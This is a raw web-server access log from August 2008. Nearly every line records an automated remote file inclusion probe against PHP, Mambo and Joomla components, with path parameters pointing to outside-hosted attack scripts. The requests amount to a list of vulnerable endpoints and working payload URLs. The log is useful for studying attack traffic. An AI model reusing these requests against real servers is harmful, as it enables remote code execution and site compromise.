66.79.163.110 - - [06/Aug/2008:22:26:45 -0500] "GET /logs/access_log.1214438400//modules/xfsection/modify.php?dir_module=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
58.25.217.217 - - [06/Aug/2008:22:26:53 -0500] "GET /logs//naboard_pnr.php?skin=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
58.25.217.217 - - [06/Aug/2008:22:26:55 -0500] "GET //naboard_pnr.php?skin=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
212.97.132.101 - - [06/Aug/2008:22:26:58 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 333 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:22:26:59 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 328 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:22:27:02 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 333 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:22:27:02 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 328 "-""libwww-perl/5.53"
87.106.191.136 - - [06/Aug/2008:22:27:48 -0500] "GET /logs/access_log.1207785600//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.106.191.136 - - [06/Aug/2008:22:27:48 -0500] "GET //ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
87.106.191.136 - - [06/Aug/2008:22:27:48 -0500] "GET /logs//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
87.106.191.136 - - [06/Aug/2008:22:27:52 -0500] "GET /logs/access_log.1207785600//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.106.191.136 - - [06/Aug/2008:22:27:52 -0500] "GET //ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
87.106.191.136 - - [06/Aug/2008:22:27:53 -0500] "GET /logs//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
204.8.217.2 - - [06/Aug/2008:22:28:20 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
204.8.217.2 - - [06/Aug/2008:22:28:20 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
218.38.12.93 - - [06/Aug/2008:22:28:28 -0500] "GET /logs/access_log.1212883200///vwar/backup/errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
217.172.183.147 - - [06/Aug/2008:22:28:32 -0500] "GET /logs/access_log.1207785600//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:32 -0500] "GET /logs/access_log.1207785600//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:33 -0500] "GET //ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:33 -0500] "GET //ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:33 -0500] "GET /logs//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:33 -0500] "GET /logs//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:41 -0500] "GET /logs/access_log.1207785600//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:41 -0500] "GET //ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:41 -0500] "GET /logs//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:44 -0500] "GET /logs/access_log.1207785600//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:45 -0500] "GET //ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
217.172.183.147 - - [06/Aug/2008:22:28:45 -0500] "GET /logs//ask_password.php?dir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
212.97.132.101 - - [06/Aug/2008:22:30:01 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 335 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:22:30:02 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 330 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:22:30:03 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 335 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:22:30:03 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 330 "-""libwww-perl/5.53"
66.79.163.110 - - [06/Aug/2008:22:30:46 -0500] "GET /logs/access_log.1212883200//modules/xfsection/modify.php?dir_module=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
74.53.152.210 - - [06/Aug/2008:22:32:39 -0500] "GET /logs/access_log.1209600000//page/vwar//convert/mvcw.php?step=1&vwar_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
74.53.152.210 - - [06/Aug/2008:22:32:39 -0500] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
74.53.152.210 - - [06/Aug/2008:22:32:39 -0500] "GET /logs/access_log.1209600000//page/vwar//convert/mvcw.php?step=1&vwar_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
74.53.152.210 - - [06/Aug/2008:22:32:40 -0500] "GET /logs//page/vwar//convert/mvcw.php?step=1&vwar_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
74.53.152.210 - - [06/Aug/2008:22:32:40 -0500] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
74.53.152.210 - - [06/Aug/2008:22:32:40 -0500] "GET /logs//page/vwar//convert/mvcw.php?step=1&vwar_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
65.254.44.210 - - [06/Aug/2008:22:33:04 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
65.254.44.210 - - [06/Aug/2008:22:33:04 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
91.121.143.183 - - [06/Aug/2008:22:34:10 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
91.121.143.183 - - [06/Aug/2008:22:34:10 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
148.223.69.2 - - [06/Aug/2008:22:35:32 -0500] "GET /logs/access_log.1212883200/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
148.223.69.2 - - [06/Aug/2008:22:35:34 -0500] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
148.223.69.2 - - [06/Aug/2008:22:35:56 -0500] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 200 94311 "-""libwww-perl/5.805"
65.214.45.147 - - [06/Aug/2008:22:37:55 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 2921 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
213.236.10.71 - - [06/Aug/2008:22:38:16 -0500] "GET /logs/scanhttp://www.zory.info/public_includes/pub_modules/mambo.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.236.10.71 - - [06/Aug/2008:22:38:16 -0500] "GET /scanhttp://www.zory.info/public_includes/pub_modules/mambo.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
66.79.163.110 - - [06/Aug/2008:22:39:02 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:22:39:03 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
204.8.217.2 - - [06/Aug/2008:22:42:37 -0500] "GET /oneadmin/include.php?path[docroot]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 304 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
204.8.217.2 - - [06/Aug/2008:22:42:38 -0500] "GET /logs/oneadmin/include.php?path[docroot]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
66.79.163.110 - - [06/Aug/2008:22:42:55 -0500] "GET /logs/access_log.1208044800/?cart_isp_root=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:22:42:55 -0500] "GET /?cart_isp_root=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:22:42:56 -0500] "GET /logs/?cart_isp_root=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 94311 "-""libwww-perl/5.811"
67.77.184.232 - - [06/Aug/2008:22:43:26 -0500] "GET /logs/access_log.1206230400/components/com_mambowiki/MamboLogin.php?IP=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
67.77.184.232 - - [06/Aug/2008:22:43:26 -0500] "GET /components/com_mambowiki/MamboLogin.php?IP=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
67.77.184.232 - - [06/Aug/2008:22:43:26 -0500] "GET /logs/components/com_mambowiki/MamboLogin.php?IP=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
59.126.46.141 - - [06/Aug/2008:22:43:38 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=http://monjali.athost.net/test.txt?? HTTP/1.1" 404 313 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
59.126.46.141 - - [06/Aug/2008:22:43:39 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://monjali.athost.net/test.txt?? HTTP/1.1" 404 318 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
67.77.184.232 - - [06/Aug/2008:22:43:58 -0500] "GET /logs/access_log.1206230400/components/com_mambowiki/MamboLogin.php?IP=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
67.77.184.232 - - [06/Aug/2008:22:44:02 -0500] "GET /components/com_mambowiki/MamboLogin.php?IP=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
67.77.184.232 - - [06/Aug/2008:22:44:02 -0500] "GET /logs/components/com_mambowiki/MamboLogin.php?IP=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
208.116.36.253 - - [06/Aug/2008:22:45:39 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
208.116.36.253 - - [06/Aug/2008:22:45:39 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
218.38.12.93 - - [06/Aug/2008:22:46:46 -0500] "GET /logs/access_log.1213315200///vwar/backup/errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:22:47:58 -0500] "GET /logs/access_log.1213142400///vwar/backup/errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
189.81.40.168 - - [06/Aug/2008:22:52:14 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
189.81.40.168 - - [06/Aug/2008:22:52:14 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
58.25.217.217 - - [06/Aug/2008:22:53:08 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
58.25.217.217 - - [06/Aug/2008:22:53:16 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
58.25.217.217 - - [06/Aug/2008:22:53:20 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
216.14.123.10 - - [06/Aug/2008:22:54:37 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
216.14.123.10 - - [06/Aug/2008:22:54:38 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
58.102.118.201 - - [06/Aug/2008:22:55:54 -0500] "GET /logs/access_log.1213315200//convert/mvcw.php?step=1&vwar_root=http://bjork.name.md/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
58.102.118.201 - - [06/Aug/2008:22:55:55 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://bjork.name.md/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
58.102.118.201 - - [06/Aug/2008:22:55:56 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://bjork.name.md/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
216.246.78.8 - - [06/Aug/2008:22:56:04 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.militaria.com/2? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
216.246.78.8 - - [06/Aug/2008:22:56:04 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.militaria.com/2? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
74.53.152.210 - - [06/Aug/2008:22:56:17 -0500] "GET /logs/access_log.1204761600//page/vwar//convert/mvcw.php?step=1&vwar_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
74.53.152.210 - - [06/Aug/2008:22:56:22 -0500] "GET /logs/access_log.1204761600//page/vwar//convert/mvcw.php?step=1&vwar_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
77.90.20.2 - - [06/Aug/2008:22:59:14 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.90.20.2 - - [06/Aug/2008:22:59:20 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
58.102.118.201 - - [06/Aug/2008:23:00:07 -0500] "GET /logs/access_log.1213315200//convert/mvcw.php?step=1&vwar_root=http://bjork.name.md/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
58.102.118.201 - - [06/Aug/2008:23:00:08 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://bjork.name.md/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
58.102.118.201 - - [06/Aug/2008:23:00:09 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://bjork.name.md/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
216.14.123.10 - - [06/Aug/2008:23:01:03 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
216.14.123.10 - - [06/Aug/2008:23:01:03 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
212.97.132.101 - - [06/Aug/2008:23:02:45 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 355 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:02:45 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 328 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:02:46 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 333 "-""libwww-perl/5.53"
83.172.146.49 - - [06/Aug/2008:23:07:17 -0500] "GET /logs/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.172.146.49 - - [06/Aug/2008:23:07:17 -0500] "GET /errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
216.55.159.47 - - [06/Aug/2008:23:07:48 -0500] "GET /logs/?vsDragonRootPath=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 94311 "-""libwww-perl/5.803"
216.55.159.47 - - [06/Aug/2008:23:07:48 -0500] "GET /?vsDragonRootPath=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
83.172.146.49 - - [06/Aug/2008:23:09:42 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
83.172.146.49 - - [06/Aug/2008:23:09:42 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
193.201.218.158 - - [06/Aug/2008:23:11:02 -0500] "GET /logs/access_log.1213315200/xmlrpc.php HTTP/1.1" 404 321 "-""libwww-perl/5.805"
147.202.40.223 - - [06/Aug/2008:23:13:09 -0500] "GET /logs/access_log.1213315200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 374 "-""libwww-perl/5.814"
193.201.218.158 - - [06/Aug/2008:23:14:18 -0500] "GET /logs/access_log.1213142400/xmlrpc.php HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.121.143.183 - - [06/Aug/2008:23:14:22 -0500] "GET /logs/!scanhttp://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
91.121.143.183 - - [06/Aug/2008:23:14:22 -0500] "GET /!scanhttp://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
212.97.132.101 - - [06/Aug/2008:23:19:33 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 301 "-""libwww-perl/5.53"
66.79.163.110 - - [06/Aug/2008:23:19:34 -0500] "GET /logs/access_log.1212883200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:23:19:34 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:23:19:34 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
70.84.182.98 - - [06/Aug/2008:23:20:42 -0500] "GET /logs/access_log.1205366400/oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
70.84.182.98 - - [06/Aug/2008:23:20:43 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
70.84.182.98 - - [06/Aug/2008:23:20:43 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
212.97.132.101 - - [06/Aug/2008:23:22:14 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 306 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:22:14 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 301 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:22:19 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 306 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:22:19 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 301 "-""libwww-perl/5.53"
70.84.182.98 - - [06/Aug/2008:23:22:23 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
91.121.143.183 - - [06/Aug/2008:23:22:37 -0500] "GET /logs/access_log.1214438400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
91.121.143.183 - - [06/Aug/2008:23:22:37 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
91.121.143.183 - - [06/Aug/2008:23:22:37 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
212.97.132.101 - - [06/Aug/2008:23:23:38 -0500] "GET /logs//config/dbutil.bck.php?confdir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 299 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:23:38 -0500] "GET //config/dbutil.bck.php?confdir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 294 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:23:39 -0500] "GET /logs//config/dbutil.bck.php?confdir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 299 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:23:39 -0500] "GET //config/dbutil.bck.php?confdir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 294 "-""libwww-perl/5.53"
74.6.18.231 - - [06/Aug/2008:23:23:49 -0500] "GET /logs/access_log.1203724800 HTTP/1.0" 200 354295 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.143.183 - - [06/Aug/2008:23:24:17 -0500] "GET /logs/access_log.1212883200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
212.97.132.101 - - [06/Aug/2008:23:24:22 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 287 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:24:23 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 282 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:24:24 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 287 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:24:24 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 282 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:25:37 -0500] "GET //config/dbutil.bck.php?confdir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 294 "-""libwww-perl/5.53"
